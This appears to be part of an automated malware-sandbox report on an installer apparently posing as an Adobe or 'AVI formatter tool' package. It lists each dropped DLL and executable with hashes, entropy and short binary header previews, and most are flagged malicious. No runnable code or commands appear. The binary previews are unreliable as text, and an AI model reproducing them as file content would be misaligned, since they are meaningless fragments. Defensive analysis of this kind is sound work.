                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:lshkyPXvH6bPACtmb8boNQdVfCXewki/OvXEApOqmFfSq1oIQMW:lsh3n5Pb8boOdVCuwNEXEAonfSq1JQb
                                                                                                                                                        MD5:BEBA64522AA8265751187E38D1FC0653
                                                                                                                                                        SHA1:63FFB566AA7B2242FCC91A67E0EDA940C4596E8E
                                                                                                                                                        SHA-256:8C58BC6C89772D0CD72C61E6CF982A3F51DEE9AAC946E076A0273CD3AAF3BE9D
                                                                                                                                                        SHA-512:13214E191C6D94DB914835577C048ADF2240C7335C0A2C2274C096114B7B75CD2CE13A76316963CCD55EE371631998FAC678FCF82AE2AE178B7813B2C35C6651
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...................................D.... ..PE..L....}.Q...........!................6 ............`..........................0......................................d#.......!..........@...................t...........................................................................................................................`....rsrc...........@...................@..@....................................@................ ......................`.......................................X...{.......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!... c.f.`P....h.p..j..P..C.h..`..<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.....................]...............'..................................A...%...........

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\lame_enc.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):967168
                                                                                                                                                        Entropy (8bit):6.500850562754145
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
                                                                                                                                                        MD5:C06D6F4DABD9E8BBDECFC5D61B43A8A9
                                                                                                                                                        SHA1:16D9F4F035835AFE8F694AE5529F95E4C3C78526
                                                                                                                                                        SHA-256:665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
                                                                                                                                                        SHA-512:B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\lessmsi\is-HSVVE.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):506871
                                                                                                                                                        Entropy (8bit):7.998074018431883
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
                                                                                                                                                        MD5:D52F8AE89AC65F755C28A95C274C1FFE
                                                                                                                                                        SHA1:50D581469FF0648EE628A027396F39598995D8B0
                                                                                                                                                        SHA-256:2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
                                                                                                                                                        SHA-512:B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK...........N..UD...."....$.AddWindowsExplorerShortcut.exe.. ..........p.../..L..../..L..../...Ykl...>3..f...6I..!7..qL.......Y;...M.HJ\....z....Y?R.B+P...*."......US.R.SB....i.....T.R.....**..3./;/..Q.].{....:s=t.c....|>...%....v:.Ot.....7.....il.rY^..4r.4.Gxl.3Yp...Q....X.".%......B......q..]k..7ae.O.....;..u.n....b..<............ w,.L'O.&...^.OJ...WT.X?RQOx|...}MA.n*.].q:!]iB`....|VW.!.@Br[...N.Xl....f....GH..~..h.......:zZ..'. ..n..._.......Gw../.X...t$$...Z.7...&X...[V.e..p..&z..-Wj.r...ku...VKg.t.5.......,.[.,G........w...}...6.rD.EN.#..uu...kb..5"..gL.>.....D.....N..!...1.o*..j..tD.!....H.X......a...._Fw..SQ~u{...4.to..7a.rrkT[.F.......nkV.....Sqc..f..gW..9Y.'.....L....U....\'=$...h...a...y...).?......Z......Z.l....+.b...O...h^.._..k......l._Q..m....w..s.eGm.=.nP..v57....H.U..6hQ~98z.A.'.z..H&...=.R.6..B'l...h...l....d]%./....<>....~....@..=....7...T0..J;.J....o.[.O..*..P.....'.k.......:.i.Bu.)...P#......^.....Jy.(o..:.?.......]./........

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\lessmsi\lessmsi-v1.6.91.zip (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):506871
                                                                                                                                                        Entropy (8bit):7.998074018431883
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
                                                                                                                                                        MD5:D52F8AE89AC65F755C28A95C274C1FFE
                                                                                                                                                        SHA1:50D581469FF0648EE628A027396F39598995D8B0
                                                                                                                                                        SHA-256:2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
                                                                                                                                                        SHA-512:B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK...........N..UD...."....$.AddWindowsExplorerShortcut.exe.. ..........p.../..L..../..L..../...Ykl...>3..f...6I..!7..qL.......Y;...M.HJ\....z....Y?R.B+P...*."......US.R.SB....i.....T.R.....**..3./;/..Q.].{....:s=t.c....|>...%....v:.Ot.....7.....il.rY^..4r.4.Gxl.3Yp...Q....X.".%......B......q..]k..7ae.O.....;..u.n....b..<............ w,.L'O.&...^.OJ...WT.X?RQOx|...}MA.n*.].q:!]iB`....|VW.!.@Br[...N.Xl....f....GH..~..h.......:zZ..'. ..n..._.......Gw../.X...t$$...Z.7...&X...[V.e..p..&z..-Wj.r...ku...VKg.t.5.......,.[.,G........w...}...6.rD.EN.#..uu...kb..5"..gL.>.....D.....N..!...1.o*..j..tD.!....H.X......a...._Fw..SQ~u{...4.to..7a.rrkT[.F.......nkV.....Sqc..f..gW..9Y.'.....L....U....\'=$...h...a...y...).?......Z......Z.l....+.b...O...h^.._..k......l._Q..m....w..s.eGm.=.nP..v57....H.U..6hQ~98z.A.'.z..H&...=.R.6..B'l...h...l....d]%./....<>....~....@..=....7...T0..J;.J....o.[.O..*..P.....'.k.......:.i.Bu.)...P#......^.....Jy.(o..:.?.......]./........

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libFLAC_dynamic.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):512014
                                                                                                                                                        Entropy (8bit):6.566561154468342
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
                                                                                                                                                        MD5:C4A2068C59597175CD1A29F3E7F31BC1
                                                                                                                                                        SHA1:89DE0169028E2BDD5F87A51E2251F7364981044D
                                                                                                                                                        SHA-256:7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
                                                                                                                                                        SHA-512:0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libdtsdec.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):126478
                                                                                                                                                        Entropy (8bit):6.268811819718352
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
                                                                                                                                                        MD5:6E93C9C8AADA15890073E74ED8D400C9
                                                                                                                                                        SHA1:94757DBD181346C7933694EA7D217B2B7977CC5F
                                                                                                                                                        SHA-256:B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
                                                                                                                                                        SHA-512:A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....m.........................p......f......... .........................{.... ...............................P..............................X........................!...............................text....\.......^..................`.P`.data........p.......b..............@.`..rdata..h&.......(...d..............@.`@/4......\B.......D..................@.0@.bss..................................`..edata..{...........................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libsoxr.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):227328
                                                                                                                                                        Entropy (8bit):6.641153481093122
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
                                                                                                                                                        MD5:BC824DC1D1417DE0A0E47A30A51428FD
                                                                                                                                                        SHA1:C909C48C625488508026C57D1ED75A4AE6A7F9DB
                                                                                                                                                        SHA-256:A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
                                                                                                                                                        SHA-512:566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e>.a...........#.........t...V.................e.........................@......1......... .........................#....................................0...............................).......................................................text...............................`.P`.data...............................@.`..rdata..d0.......2..................@.`@.eh_framd@...@...B..................@.0@.bss.....T............................`..edata..#............T..............@.0@.idata...............^..............@.0..CRT....,............d..............@.0..tls......... .......f..............@.0..reloc.......0.......h..............@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libwebp.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):394752
                                                                                                                                                        Entropy (8bit):6.662070316214798
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:uAlmRfeS+mOxv8bgDTuXU54l8WybBE36IpuIT9nxQPQnhH/a0CRdWqWJwGKp:zlm0S+SEuXU54NylJIJ9KPQnhilRsVJ
                                                                                                                                                        MD5:A4123DE65270C91849FFEB8515A864C4
                                                                                                                                                        SHA1:93971C6BB25F3F4D54D4DF6C0C002199A2F84525
                                                                                                                                                        SHA-256:43A9928D6604BF604E43C2E1BAB30AE1654B3C26E66475F9488A95D89A4E6113
                                                                                                                                                        SHA-512:D0834F7DB31ABA8AA9D97479938DA2D4CD945F76DC2203D60D24C75D29D36E635C2B0D97425027C4DEBA558B8A41A77E288F73263FA9ABC12C54E93510E3D384
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......KL...-d..-d..-d..U...-d..Be..-d.TEe..-d..-e.:-d..Ba..-d..B`..-d..Bg..-d..B`.c-d..Bd..-d..B...-d..Bf..-d.Rich.-d.........................PE..L.....b`...........!.....L..........+S.......`...............................P............@.................................L........... .................... ..\ ..$...............................@...@............`...............................text...NK.......L.................. ..`.rdata......`.......P..............@..@.data...............................@....rsrc... ...........................@..@.reloc..\ ... ..."..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libwinpthread-1.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):68042
                                                                                                                                                        Entropy (8bit):6.090396152400884
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:RX3HAdi7wgCsL6dVSngk2IFm3ZJVRDBLRROBBKRzPm3YRiF+ixh:NHQpe6SnZQLjICPm3Ytib
                                                                                                                                                        MD5:5DDA5D34AC6AA5691031FD4241538C82
                                                                                                                                                        SHA1:22788C2EBE5D50FF36345EA0CB16035FABAB8A6C
                                                                                                                                                        SHA-256:DE1A9DD251E29718176F675455592BC1904086B9235A89E6263A3085DDDCBB63
                                                                                                                                                        SHA-512:08385DE11A0943A6F05AC3F8F1E309E1799D28EA50BF1CA6CEB01E128C0CD7518A64E55E8B56A4B8EF9DB3ECD2DE33D39779DCA1FBF21DE735E489A09159A1FD
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...&...........................d......................................@... ..............................0..t....`..P....................p.......................................................1..H............................text...d...........................`..`.data...L...........................@....rdata..\...........................@..@/4.......2.......4..................@..@.bss.....................................edata..............................@..@.idata..t....0......................@....CRT....0....@......................@....tls.........P......................@....rsrc...P....`......................@....reloc.......p......................@..B........................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\mp3gain.exe (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):123406
                                                                                                                                                        Entropy (8bit):6.263889638223575
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:hnPkU1t2P2hHV5JG1YBBAUBEd8+poyez9djcx2/8s6UJqfxX+1XOAhbKzb3+d:xPu21IYyCTToE6c+6e+d
                                                                                                                                                        MD5:B49ECFA819479C3DCD97FAE2A8AB6EC6
                                                                                                                                                        SHA1:1B8D47D4125028BBB025AAFCA1759DEB3FC0C298
                                                                                                                                                        SHA-256:B9D5317E10E49AA9AD8AD738EEBE9ACD360CC5B20E2617E5C0C43740B95FC0F2
                                                                                                                                                        SHA-512:18617E57A76EFF6D95A1ED735CE8D5B752F1FB550045FBBEDAC4E8E67062ACD7845ADC6FBE62238C383CED5E01D7AA4AB8F968DC442B67D62D2ED712DB67DC13
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................R.......d>..........p....@...........................@......^........ ...............................@.4...................................................................................|.@.@............................text....Q.......R..................`.P`.data...\....p.......V..............@.@..rdata...a.......b...X..............@.`@/4..................................@.0@.bss.....c>...........................`..idata..4.....@.....................@.0..CRT....4.....@.....................@.0..tls..........@.....................@.0.................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\pcm2dsd.exe (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):22542
                                                                                                                                                        Entropy (8bit):5.5875455203930615
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:RKAPwPQJgZd3rw0bGMtyz1fiaqmjj1nFY4j70UotV9mRyK:YPQJgZZwUGH1fJljj1+D18
                                                                                                                                                        MD5:E1C0147422B8C4DB4FC4C1AD6DD1B6EE
                                                                                                                                                        SHA1:4D10C5AD96756CBC530F3C35ADCD9E4B3F467CFA
                                                                                                                                                        SHA-256:124F210C04C12D8C6E4224E257D934838567D587E5ABAEA967CBD5F088677049
                                                                                                                                                        SHA-512:A163122DFFE729E6F1CA6EB756A776F6F01A784A488E2ACCE63AEAFA14668E8B1148BE948EB4AF4CA8C5980E85E681960B8A43C94B95DFFC72FCCEE1E170BD9A
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........X...............,...T...............@....@.......................................... .................................@...........................................................PU..........................P............................text....+.......,..................`.P`.data........@.......0..............@.`..rdata..0....P.......2..............@.0@/4...........`.......<..............@.0@.bss.........p........................`..idata..@............J..............@.0..CRT....4............T..............@.0..tls.................V..............@.0.................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\plugins\internal\is-29FOL.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):15374
                                                                                                                                                        Entropy (8bit):5.25938266470983
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:l0HhuwYqkoiCBJRgcsZQPCkWa/HI77wbcRODYCpes2n13dwczbUwS7RE8SD:lqhoqkVCXWgI77B0hGnLwczbUwSC8g
                                                                                                                                                        MD5:228EE3AFDCC5F75244C0E25050A346CB
                                                                                                                                                        SHA1:822B7674D1B7B091C1478ADD2F88E0892542516F
                                                                                                                                                        SHA-256:7ACD537F3BE069C7813DA55D6BC27C3A933DF2CF07D29B4120A8DF0C26D26561
                                                                                                                                                        SHA-512:7DFA06B9775A176A9893E362B08DA7F2255037DC99FB6BE53020ECD4841C7E873C03BAC11D14914EFDFE84EFEB3FB99745566BB39784962365BEEBDB89A4531B
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0....Xj.......................................... ......................p......................................................................P@......................................................text...$...........................`.P`.data...,....0......................@.0..rdata.......@....... ..............@.0@/4...........P......."..............@.0@.bss.........`........................`..edata.......p......................@.0@.idata...............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\plugins\internal\is-H7480.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):25614
                                                                                                                                                        Entropy (8bit):6.0293046975090325
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:MiksLrrN6mRXYYYYYYYYYYYYYYYYYYYYYYYYYI9W0oM:zrHFYYYYYYYYYYYYYYYYYYYYYYYYY70N
                                                                                                                                                        MD5:B82364A204396C352F8CC9B2F8ABEF73
                                                                                                                                                        SHA1:20AD466787D65C987A9EBDBD4A2E8845E4D37B68
                                                                                                                                                        SHA-256:2A64047F9B9B07F6CB22BFE4F9D4A7DB06994B6107B5EA2A7E38FAFA9E282667
                                                                                                                                                        SHA-512:C8CAFA4C315CE96D41AD521E72180DF99931B5F448C8647161E7F9DCA29AA07213B9CCEF9E3F7FB5353C7B459E3DA620E560153BDBA1AB529C206330DBD26FF5
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#....."...`...............@.... g.................................a........ .........................@.......@...............................`............................c.......................................................text.... ......."..................`.P`.data........@.......&..............@.`..rdata.......`.......@..............@.0@/4...........p.......F..............@.0@.bss..................................`..edata..@............T..............@.0@.idata..@............V..............@.0..CRT....,............\..............@.0..tls.................^..............@.0..reloc..`............`..............@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):15374
                                                                                                                                                        Entropy (8bit):5.25938266470983
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:l0HhuwYqkoiCBJRgcsZQPCkWa/HI77wbcRODYCpes2n13dwczbUwS7RE8SD:lqhoqkVCXWgI77B0hGnLwczbUwSC8g
                                                                                                                                                        MD5:228EE3AFDCC5F75244C0E25050A346CB
                                                                                                                                                        SHA1:822B7674D1B7B091C1478ADD2F88E0892542516F
                                                                                                                                                        SHA-256:7ACD537F3BE069C7813DA55D6BC27C3A933DF2CF07D29B4120A8DF0C26D26561
                                                                                                                                                        SHA-512:7DFA06B9775A176A9893E362B08DA7F2255037DC99FB6BE53020ECD4841C7E873C03BAC11D14914EFDFE84EFEB3FB99745566BB39784962365BEEBDB89A4531B
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0....Xj.......................................... ......................p......................................................................P@......................................................text...$...........................`.P`.data...,....0......................@.0..rdata.......@....... ..............@.0@/4...........P......."..............@.0@.bss.........`........................`..edata.......p......................@.0@.idata...............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):25614
                                                                                                                                                        Entropy (8bit):6.0293046975090325
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:MiksLrrN6mRXYYYYYYYYYYYYYYYYYYYYYYYYYI9W0oM:zrHFYYYYYYYYYYYYYYYYYYYYYYYYY70N
                                                                                                                                                        MD5:B82364A204396C352F8CC9B2F8ABEF73
                                                                                                                                                        SHA1:20AD466787D65C987A9EBDBD4A2E8845E4D37B68
                                                                                                                                                        SHA-256:2A64047F9B9B07F6CB22BFE4F9D4A7DB06994B6107B5EA2A7E38FAFA9E282667
                                                                                                                                                        SHA-512:C8CAFA4C315CE96D41AD521E72180DF99931B5F448C8647161E7F9DCA29AA07213B9CCEF9E3F7FB5353C7B459E3DA620E560153BDBA1AB529C206330DBD26FF5
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#....."...`...............@.... g.................................a........ .........................@.......@...............................`............................c.......................................................text.... ......."..................`.P`.data........@.......&..............@.`..rdata.......`.......@..............@.0@/4...........p.......F..............@.0@.bss..................................`..edata..@............T..............@.0@.idata..@............V..............@.0..CRT....,............\..............@.0..tls.................^..............@.0..reloc..`............`..............@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\rg_ebur128.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):43520
                                                                                                                                                        Entropy (8bit):6.232860260916194
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:XozEJVjDF38DrOPwLg0cAY7K+k+Y+TyHMjMbHVJx9jm3LkkteFfXbBekdAnPKx:Xo4JJDirOoLg0C7F/rDGdpB52PK
                                                                                                                                                        MD5:B162992412E08888456AE13BA8BD3D90
                                                                                                                                                        SHA1:095FA02EB14FD4BD6EA06F112FDAFE97522F9888
                                                                                                                                                        SHA-256:2581A6BCA6F4B307658B24A7584A6B300C91E32F2FE06EB1DCA00ADCE60FA723
                                                                                                                                                        SHA-512:078594DE66F7E065DCB48DA7C13A6A15F8516800D5CEE14BA267F43DC73BC38779A4A4ED9444AFDFA581523392CBE06B0241AA8EC0148E6BCEA8E23B78486824
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....z.......D................,n.........................p.......`........ ...................... .......0...............................`..............................t........................0...............................text....x.......z..................`.P`.data...,............~..............@.0..rdata..............................@.P@.eh_fram|...........................@.0@.bss.....B............................`..edata....... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\sd.dll (copy)

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):240654
                                                                                                                                                        Entropy (8bit):6.518503846592995
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:yZDfF4DjzIHBV+bUeenu+t+oSTdjpNZ7utS81qpHW4paP2L:ekjzMBVKXeuq+oSTdjpr7N8f+L
                                                                                                                                                        MD5:4F0C85351AEC4B00300451424DB4B5A4
                                                                                                                                                        SHA1:BB66D807EDE0D7D86438207EB850F50126924C9D
                                                                                                                                                        SHA-256:CC0B53969670C7275A855557EA16182C932160BC0F8543EFFC570F760AE2185E
                                                                                                                                                        SHA-512:80C84403ED47380FF75EBA50A23E565F7E5C68C7BE8C208A5A48B7FB0798FF51F3D33780C902A6F8AB0E6DB328860C071C77B93AC88CADF84FEF7DF34DE3E2DA
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....H...................`.....g.................................\........ .........................o.......\...............................t............................S.......................................................text...dF.......H..................`.P`.data...X....`.......L..............@.P..rdata.......p.......N..............@.`@/4.......<.......>...T..............@.0@.bss..................................`..edata..o...........................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls................................@.0..reloc..t...........................@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\tak_deco_lib.dll (copy)

                                                                                                                                                        Download File
